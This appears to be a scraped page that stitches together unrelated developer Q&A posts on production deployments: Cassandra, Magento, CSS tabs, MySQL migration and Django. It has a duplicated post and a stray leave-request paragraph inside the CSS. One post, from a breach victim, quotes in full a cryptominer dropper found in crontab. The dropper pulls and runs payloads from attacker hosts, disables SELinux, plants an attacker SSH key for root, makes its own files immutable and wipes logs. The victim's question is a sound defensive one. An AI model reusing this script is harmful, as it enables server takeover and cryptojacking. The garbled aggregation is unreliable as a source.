Production availability impact of adding column to existing Cassandra table?

It appears that adding a column to an existing table in a production Cassandra cluster is pretty common. Under what conditions is it considered acceptable/safe to do so, in terms of availability and performance?

If it’s difficult or impossible to provide a definitive or clear-cut answer, then how would the expected impact be characterized? Impact might be expressed in terms of e.g. simply “no expected availability impact;” Big-O notation; or empirical measurements like duration of add operation, change in request latencies for impacted Cassandra cluster or (end to end for) client service, change in CPU or memory utilization of impacted cluster. Citations of a good resource(s) on the topic would be helpful.

My production Ubuntu server was breached through Redis and I found this script. Is it a decoy?

A few days ago my VPS came under heavy load from spammers trying ssh attacks and script injections. I have since added new fail2ban regexps and new security measures for REDIS where it looks like they were able to enter from. I found this entry in my redis and root users’ crontab.

*/1 * * * * cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh 

Had there been an “l” at the end of curl, that would have been the end of my server. I (carefully) downloaded and inspected the script and it would have run this apparent crypto miner

setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null sync && echo 3 >/proc/sys/vm/drop_caches crondir='/var/spool/cron/'"$  USER" cont=`cat $  {crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/sysupdates rtdir="/etc/sysupdates" bbdir="/usr/bin/curl" bbdira="/usr/bin/cur" ccdir="/usr/bin/wget" ccdira="/usr/bin/wge" mv /usr/bin/wget /usr/bin/get mv /usr/bin/xget /usr/bin/get mv /usr/bin/get /usr/bin/wge mv /usr/bin/curl /usr/bin/url mv /usr/bin/xurl /usr/bin/url mv /usr/bin/url /usr/bin/cur miner_url="https://de.gsearch.com.de/api/sysupdate" miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate" miner_size="854364" sh_url="https://de.gsearch.com.de/api/update.sh" sh_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh" config_url="https://de.gsearch.com.de/api/config.json" config_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json" config_size="4954" scan_url="https://de.gsearch.com.de/api/networkservice" scan_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice" scan_size="2584072" watchdog_url="https://de.gsearch.com.de/api/sysguard" watchdog_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard" watchdog_size="1929480"  kill_miner_proc() {     ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $  2}'|xargs kill -9     ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $  2}'|xargs kill -9     ps auxf|grep xiaoyao| awk '{print $  2}'|xargs kill -9     ps auxf|grep xiaoxue| awk '{print $  2}'|xargs kill -9     ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9     ps ax|grep -o './[0-9]* -c'| xargs pkill -f     pkill -f biosetjenkins     pkill -f Loopback     pkill -f apaceha     pkill -f cryptonight     pkill -f stratum     pkill -f mixnerdx     pkill -f performedl     pkill -f JnKihGjn     pkill -f irqba2anc1     pkill -f irqba5xnc1     pkill -f irqbnc1     pkill -f ir29xc1     pkill -f conns     pkill -f irqbalance     pkill -f crypto-pool     pkill -f minexmr     pkill -f XJnRj     pkill -f mgwsl     pkill -f pythno     pkill -f jweri     pkill -f lx26     pkill -f NXLAi     pkill -f BI5zj     pkill -f askdljlqw     pkill -f minerd     pkill -f minergate     pkill -f Guard.sh     pkill -f ysaydh     pkill -f bonns     pkill -f donns     pkill -f kxjd     pkill -f Duck.sh     pkill -f bonn.sh     pkill -f conn.sh     pkill -f kworker34     pkill -f kw.sh     pkill -f pro.sh     pkill -f polkitd     pkill -f acpid     pkill -f icb5o     pkill -f nopxi     pkill -f irqbalanc1     pkill -f minerd     pkill -f i586     pkill -f gddr     pkill -f mstxmr     pkill -f ddg.2011     pkill -f wnTKYg     pkill -f deamon     pkill -f disk_genius     pkill -f sourplum     pkill -f polkitd     pkill -f nanoWatch     pkill -f zigw     pkill -f devtool     pkill -f systemctI     pkill -f WmiPrwSe         pkill -f sysguard             pkill -f sysupdate                 pkill -f networkservice     crontab -r     rm -rf /var/spool/cron/* } downloads() {     if [ -f "/usr/bin/curl" ]     then      echo $  1,$  2         http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $  1`         if [ "$  http_code" -eq "200" ]         then             curl --connect-timeout 10 --retry 100 $  1 > $  2         elif [ "$  http_code" -eq "405" ]         then             curl --connect-timeout 10 --retry 100 $  1 > $  2         else             curl --connect-timeout 10 --retry 100 $  3 > $  2         fi     elif [ -f "/usr/bin/cur" ]     then         http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $  1`         if [ "$  http_code" -eq "200" ]         then             cur --connect-timeout 10 --retry 100 $  1 > $  2         elif [ "$  http_code" -eq "405" ]         then             cur --connect-timeout 10 --retry 100 $  1 > $  2         else             cur --connect-timeout 10 --retry 100 $  3 > $  2         fi     elif [ -f "/usr/bin/wget" ]     then         wget --timeout=10 --tries=100 -O $  2 $  1         if [ $  ? -ne 0 ]     then         wget --timeout=10 --tries=100 -O $  2 $  3         fi     elif [ -f "/usr/bin/wge" ]     then         wge --timeout=10 --tries=100 -O $  2 $  1         if [ $  ? -eq 0 ]         then             wge --timeout=10 --tries=100 -O $  2 $  3         fi     fi }  kill_sus_proc() {     ps axf -o "pid"|while read procid     do             ls -l /proc/$  procid/exe | grep /tmp             if [ $  ? -ne 1 ]             then                     cat /proc/$  procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"                     if [ $  ? -ne 0 ]                     then                             kill -9 $  procid                     else                             echo "don't kill"                     fi             fi     done     ps axf -o "pid %cpu" | awk '{if($  2>=40.0) print $  1}' | while read procid     do             cat /proc/$  procid/cmdline| grep -a -E "sysguard|update.sh|sysupdate|networkservice"             if [ $  ? -ne 0 ]             then                     kill -9 $  procid             else                     echo "don't kill"             fi     done }  kill_miner_proc kill_sus_proc  if [ -f "$  rtdir" ] then         echo "i am root"         echo "goto 1" >> /etc/sysupdate         chattr -i /etc/sysupdate*         chattr -i /etc/config.json*         chattr -i /etc/update.sh*         chattr -i /root/.ssh/authorized_keys*         chattr -i /etc/networkservice     if [ ! -f "/usr/bin/crontab" ]         then              echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> $  {crondir}         else             [[ $  cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -     fi         chmod 700 /root/.ssh/         echo >> /root/.ssh/authorized_keys         chmod 600 root/.ssh/authorized_keys         echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys           cfg="/etc/config.json"         file="/etc/sysupdate"      if [-f "/etc/config.json" ]     then         filesize_config=`ls -l /etc/config.json | awk '{ print $  5 }'`         if [ "$  filesize_config" -ne "$  config_size" ]             then             pkill -f sysupdate             rm /etc/config.json             downloads $  config_url /etc/config.json $  config_url_backup         else             echo "no need download"         fi     else         downloads $  config_url /etc/config.json $  config_url_backup     fi      if [ -f "/etc/sysupdate" ]     then             filesize1=`ls -l /etc/sysupdate | awk '{ print $  5 }'`             if [ "$  filesize1" -ne "$  miner_size" ]              then                 pkill -f sysupdate                 rm /etc/sysupdate                 downloads $  miner_url /etc/sysupdate $  miner_url_backup             else                 echo "not need download"             fi     else             downloads $  miner_url /etc/sysupdate $  miner_url_backup     fi      if [ -f "/etc/sysguard" ]     then             filesize1=`ls -l /etc/sysguard | awk '{ print $  5 }'`             if [ "$  filesize1" -ne "$  watchdog_size" ]              then                 pkill -f sysguard                 rm /etc/sysguard                 downloads $  watchdog_url /etc/sysguard $  watchdog_url_backup             else                 echo "not need download"             fi     else             downloads $  watchdog_url /etc/sysguard $  watchdog_url_backup     fi      downloads $  sh_url /etc/update.sh $  sh_url_backup      if [ -f "/etc/networkservice" ]     then             filesize2=`ls -l /etc/networkservice | awk '{ print $  5 }'`             if [ "$  filesize2" -ne "$  scan_size" ]              then                 pkill -f networkservice                 rm /etc/networkservice                 downloads  $  scan_url /etc/networkservice $  scan_url_backup             else                 echo "not need download"             fi     else             downloads $  scan_url /etc/networkservice $  scan_url_backup     fi      chmod 777 /etc/sysupdate     ps -fe|grep sysupdate |grep -v grep     if [ $  ? -ne 0 ]     then                 cd /etc                 echo "not root runing"                 sleep 5s                 ./sysupdate &     else                 echo "root runing....."     fi     chmod 777 /etc/networkservice     ps -fe|grep networkservice |grep -v grep     if [ $  ? -ne 0 ]     then                 cd /etc                 echo "not roots runing"                 sleep 5s                 ./networkservice &     else                 echo "roots runing....."     fi     chmod 777 /etc/sysguard     ps -fe|grep sysguard |grep -v grep         if [ $  ? -ne 0 ]             then                 echo "not tmps runing"                 cd /etc                 chmod 777 sysguard                 sleep 5s                 ./sysguard &             else                 echo "roots runing....."         fi       chmod 777 /etc/sysupdate     chattr +i /etc/sysupdate     chmod 777 /etc/networkservice     chattr +i /etc/networkservice     chmod 777 /etc/config.json     chattr +i /etc/config.json     chmod 777 /etc/update.sh     chattr +i /etc/update.sh     chmod 777 /root/.ssh/authorized_keys     chattr +i /root/.ssh/authorized_keys else     echo "goto 1" > /tmp/sysupdates     chattr -i /tmp/sysupdate*     chattr -i /tmp/networkservice     chattr -i /tmp/config.json*     chattr -i /tmp/update.sh*      if [ ! -f "/usr/bin/crontab" ]     then              echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1" >> $  {crondir}     else             [[ $  cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/update.sh >/dev/null 2>&1") | crontab -     fi      if [ -f "/tmp/config.json" ]     then         filesize1=`ls -l /tmp/config.json | awk '{ print $  5 }'`         if [ "$  filesize1" -ne "$  config_size" ]         then             pkill -f sysupdate             rm /tmp/config.json             downloads  $  config_url /tmp/config.json $  config_url_backup         else             echo "no need download"         fi     else         downloads $  config_url /tmp/config.json $  config_url_backup     fi      if [ -f "/tmp/sysupdate" ]     then             filesize1=`ls -l /tmp/sysupdate | awk '{ print $  5 }'`         if [ "$  filesize1" -ne "$  miner_size" ]          then                 pkill -f sysupdate                 rm /tmp/sysupdate                 downloads $  miner_url /tmp/sysupdate $  miner_url_backup         else                 echo "no need download"         fi     else             downloads $  miner_url /tmp/sysupdate $  miner_url_backup     fi      if [ -f "/tmp/sysguard" ]     then             filesize1=`ls -l /tmp/sysguard | awk '{ print $  5 }'`             if [ "$  filesize1" -ne "$  watchdog_size" ]              then                 pkill -f sysguard                 rm /tmp/sysguard                 downloads $  watchdog_url /tmp/sysguard $  watchdog_url_backup             else                 echo "not need download"             fi     else             downloads $  watchdog_url /tmp/sysguard $  watchdog_url_backup     fi      echo "i am here"     downloads $  sh_url /tmp/update.sh $  sh_url_backup      if [ -f "/tmp/networkservice" ]     then          filesize2=`ls -l /tmp/networkservice | awk '{ print $  5 }'`         if [ "$  filesize2" -ne "$  scan_size" ]           then                 pkill -f networkservice                 rm /tmp/networkservice                 downloads $  scan_url /tmp/networkservice $  scan_url_backup         else                 echo "no need download"         fi     else             downloads $  scan_url /tmp/networkservice $  scan_url_backup     fi      ps -fe|grep sysupdate |grep -v grep         if [ $  ? -ne 0 ]             then                 echo "not tmp runing"                 cd /tmp                 chmod 777 sysupdate                 sleep 5s                 ./sysupdate &             else                 echo "tmp runing....."         fi     ps -fe|grep networkservice |grep -v grep         if [ $  ? -ne 0 ]             then                 echo "not tmps runing"                 cd /tmp                 chmod 777 networkservice                 sleep 5s                 ./networkservice &             else                 echo "tmps runing....."         fi      ps -fe|grep sysguard |grep -v grep         if [ $  ? -ne 0 ]             then                 echo "not tmps runing"                 cd /tmp                 chmod 777 sysguard                 sleep 5s                 ./sysguard &             else                 echo "tmps runing....."         fi      chmod 777 /tmp/sysupdate     chattr +i /tmp/sysupdate     chmod 777 /tmp/networkservice     chattr +i /tmp/networkservice     chmod 777 /tmp/sysguard     chattr +i /tmp/sysguard     chmod 777 /tmp/update.sh     chattr +i /tmp/update.sh     chmod 777 /tmp/config.json     chattr +i /tmp/config.json  fi iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 3333 -j DROP iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -I INPUT -s 43.245.222.57 -j DROP service iptables reload ps auxf|grep -v grep|grep "stratum"|awk '{print $  2}'|xargs kill -9 history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history 

My question is, why is there no “l” in curl? Is this a decoy and I still have malicious software somewhere in my server? Is it white hats just telling me they found an exploit? Did some anti malware floating around in cyberspace change the malicious script?

How to deploy to production server customizations made in vendor folder?

So, We have 3 environments: development, staging and production.

.gitignore file includes “vendor” folder and it has been working fine for us fine. Once We pull changes in Staging We would just run:

composer install php bin/magento setup:upgrade && php bin/magento setup:di:compile && php bin/magento setup:static-content:deploy && php bin/magento c:enable && php bin/magento c:c 

The issue is: We had to customize a third party extension installed by composer (under “vendor” folder) and this path is ignored by Git. What should I do to keep track of this changes and deploy them to staging server?

I could “git add -f ” but would like your opinion on best practices.

how can i move my site into production

can you please help me out with proper explanation i am unable to publish my site so can you help me out for the proper explanation

*{margin:0; padding:0;} body{font-family:tahoma; font-size:16px;} ul,ol,li{list-style-type:none;} ol.tabs_content > li{display:none;} a{text-decoration:none;} :focus{outline:none;} .wrap{display:flex; width:100%; margin: 0 auto;} ul.tabs{width:20%; background:#ccc;} ul.tabs li a{background:#ccc; color:#000; padding:30px 20px; display:block; border-bottom:1px solid #fff;} ul.tabs li a:hover{background:#525efa; color:#fff;} ul.tabs li a.active{background:#525efa; color:#fff;} ol.tabs_content{background:#525efa; width:80%;padding: 30px; box-sizing: border-box;} ol.tabs_content li h2{margin-bottom: 30px;color: #fff;border-bottom: 1px solid #fff;padding-bottom: 20px;} .green p{margin-bottom:10px;} .green p a, p{color:#fff;} i{color:#fff; font-size:20px !important; margin-right:8px;} I would like to apply for a 2-day leave because of my cousin’s upcoming birthday. Since he lives in New York, I will be flying out a day before his birthday.

It is important for me to attend because our whole family will be gathering on the occasion. For this reason, I would greatly appreciate if you approved my leaves.

/Now the CSS/ * {margin: 0; padding: 0;}

.tree ul { padding-top: 20px; position: relative; width:100%; min-height:400px; transition: all 0.5s; -webkit-transition: all 0.5s; -moz-transition: all 0.5s; width:100%; }

.tree li { float: left; text-align: center; list-style-type: none; position: relative; padding: 20px 5px 0 5px;

transition: all 0.5s; -webkit-transition: all 0.5s; -moz-transition: all 0.5s; 

}

/We will use ::before and ::after to draw the connectors/

.tree li::before, .tree li::after{ content: ”; position: absolute; top: 0; right: 50%; border-top: 1px solid #fff; width: 50%; height: 20px; } .tree li::after{ right: auto; left: 50%; border-left: 1px solid #fff; }

/We need to remove left-right connectors from elements without any siblings/ .tree li:only-child::after, .tree li:only-child::before { display: none; }

/Remove space from the top of single children/ .tree li:only-child{ padding-top: 0;}

/Remove left connector from first child and right connector from last child/ .tree li:first-child::before, .tree li:last-child::after{ border: 0 none; } /Adding back the vertical connector to the last nodes/ .tree li:last-child::before{ border-right: 1px solid #ccc; border-radius: 0 5px 0 0; -webkit-border-radius: 0 5px 0 0; -moz-border-radius: 0 5px 0 0; } .tree li:first-child::after{ border-radius: 5px 0 0 0; -webkit-border-radius: 5px 0 0 0; -moz-border-radius: 5px 0 0 0; }

/Time to add downward connectors from parents/ .tree ul ul::before{ content: ”; position: absolute; top: 0; left: 50%; border-left: 1px solid #ccc; width: 0; height: 20px; }

.tree li a{ border: 1px solid #fff; padding: 5px 10px; text-decoration: none; color: #666; font-family: arial, verdana, tahoma; font-size: 11px; display: inline-block; background-color:#fff;

border-radius: 5px; -webkit-border-radius: 5px; -moz-border-radius: 5px;  transition: all 0.5s; -webkit-transition: all 0.5s; -moz-transition: all 0.5s; 

}

/Time for some hover effects/ /We will apply the hover effect the the lineage of the element also/ .tree li a:hover, .tree li a:hover+ul li a { background: #ccc; color: #000; border: 1px solid #94a0b4; } /Connector styles on hover/ .tree li a:hover+ul li::after, .tree li a:hover+ul li::before, .tree li a:hover+ul::before, .tree li a:hover+ul ul::before{ border-color: #fff; }

.w350{width:350px;} .w140{width:140px;} .w170{width:170px;}

.block{display:block; font-size:14px; text-transform:uppercase;} .marT20{margin-top:10px;} .tree{width:100%; text-align:center;}

/Thats all. I hope you enjoyed it. Thanks 🙂/

  • Org Structure
  • Social Network
  • Customer Contact
  • Order Fill
  • Org Structure

    • CEO
        Director

          Staff

          Staff

        Director

        Director

    Social Network

    Facebook

    LinkedIn

    Twitter

    Customer Contact

    Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.

    Order Fill

    Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.

    window.jQuery||document.write(‘”); (function($ j){ $ j(‘ul.tabs > li a’).click( function(){ $ j(‘ul.tabs > li a’).removeClass(‘active’); $ j(this).addClass(‘active’); var currentIndex = $ j(this).parent().index()+1; $ j(‘ol.tabs_content > li’).hide(); $ j(this).parents(‘.wrap’).find(‘ol.tabs_content > li:nth-child(‘+currentIndex+’)’).show(); }); });

    Magento2: Production Critical Error on Cloudinary

    I am trying to run the setup:upgrade command I get the following error

    PHP Fatal error: Uncaught Error: Call to a member function getCloud() on null in /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/Configuration.php:149 Stack trace: #0 /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Core/ConfigurationBuilder.php(20): Cloudinary\Cloudinary\Model\Configuration->getCloud() #1 /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/BatchDownloader.php(156): Cloudinary\Cloudinary\Core\ConfigurationBuilder->build() #2 /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/BatchDownloader.php(150): Cloudinary\Cloudinary\Model\BatchDownloader->_authorise() #3 /var/www/asprod/vendor/magento/framework/ObjectManager/Factory/AbstractFactory.php(111): Cloudinary\Cloudinary\Model\BatchDownloader->__construct(Object(Cloudinary\Cloudinary\Model\Configuration), Object(Cloudinary\Cloudinary\Core\ConfigurationBuilder), Object(Cloudinary\Cloudinary\Model\MigrationTask), Object(Cloudinary\Api), Object(Magento\Framework\App\Filesystem\DirectoryList), Object(Magento\Framework\HTTP\Adapter\ in /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/Configuration.php on line 149

    I am using these steps to install cloudinary

    composer require cloudinary/cloudinary-magento2  php bin/magento maintenance:enable  php bin/magento setup:upgrade  php bin/magento setup:di:compile  php bin/magento setup:static-content:deploy  php bin/magento maintenance:disable  php bin/magento cache:flush 

    Using PHP 7.0, Magento 2.2.0 and Ubuntu 18.04. Without the cloudinary extension, everything is working fine but the site doesn’t display any images since they are all hosted on Cloudinary.

    Magento2: Production Critical Error on Cloudinary

    I am trying to run the setup:upgrade command I get the following error

    PHP Fatal error: Uncaught Error: Call to a member function getCloud() on null in /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/Configuration.php:149 Stack trace: #0 /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Core/ConfigurationBuilder.php(20): Cloudinary\Cloudinary\Model\Configuration->getCloud() #1 /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/BatchDownloader.php(156): Cloudinary\Cloudinary\Core\ConfigurationBuilder->build() #2 /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/BatchDownloader.php(150): Cloudinary\Cloudinary\Model\BatchDownloader->_authorise() #3 /var/www/asprod/vendor/magento/framework/ObjectManager/Factory/AbstractFactory.php(111): Cloudinary\Cloudinary\Model\BatchDownloader->__construct(Object(Cloudinary\Cloudinary\Model\Configuration), Object(Cloudinary\Cloudinary\Core\ConfigurationBuilder), Object(Cloudinary\Cloudinary\Model\MigrationTask), Object(Cloudinary\Api), Object(Magento\Framework\App\Filesystem\DirectoryList), Object(Magento\Framework\HTTP\Adapter\ in /var/www/asprod/vendor/cloudinary/cloudinary-magento2/Model/Configuration.php on line 149

    I am using these steps to install cloudinary

    composer require cloudinary/cloudinary-magento2  php bin/magento maintenance:enable  php bin/magento setup:upgrade  php bin/magento setup:di:compile  php bin/magento setup:static-content:deploy  php bin/magento maintenance:disable  php bin/magento cache:flush 

    Using PHP 7.0, Magento 2.2.0 and Ubuntu 18.04. Without the cloudinary extension, everything is working fine but the site doesn’t display any images since they are all hosted on Cloudinary.

    migration from mysql to nosql database in production without code change and mysql without foreign keys and indexes

    i have two scenarios here :

    1. migrating mysql database to nosql without code change(no orms are used)
    2. using no foriegn keys and indexes in mysql(because they want to migrate to different database in future) 3.all this done by very less code change

    these questions are asked by my team lead. so i dont have a answer to give him properly because i feel it very unlikely to do mysql with no indexes and foreign keys and first of all if they are not meant to use mysql.then why they choose that.

    1. i want to know that people do like this in software industries ofently or they will choose on their need fits correctly
    2. they are saying that foreign key validitations are done by api level not by mysql level

    i dont understand them becasue i have less experience so i dont have an answer why they are saying like this. please give me some insight to this that if this is a good practice or not ?

    How should I update non-maintained database tables between production and development?

    I’m working on a Django web application (with a mySQL back-end) that uses non-maintained tables(tables not modified by the web app). However, I have two copies of the data tables (one for production and one for development).

    A problem occurs when I need to manually modify the non-maintained data in the development version. Because there are two separate tables, I need to manually update the corresponding data in the production version.

    Is there a recommended form of version control for the non-maintained tables? I was thinking of using SQLite for the non-maintained data tables and letting Git track their files.

    Jobs In Audio Video Editing And Post production

    Film making is not an easier task, to make it simple and easier it has been split into 3 main sections i.e. Pre production, Production and Post production. Let’s discuss these three in brief:
    Pre Production: In this preparations are made for the shoot, in which cast and crew are hired, locations are selected and sets are built.
    Production: In Production raw materials for the finished film are recorded and, last step i.e.
    Post Production: It turns individual scenes, called raw footages…

    Jobs In Audio Video Editing And Post production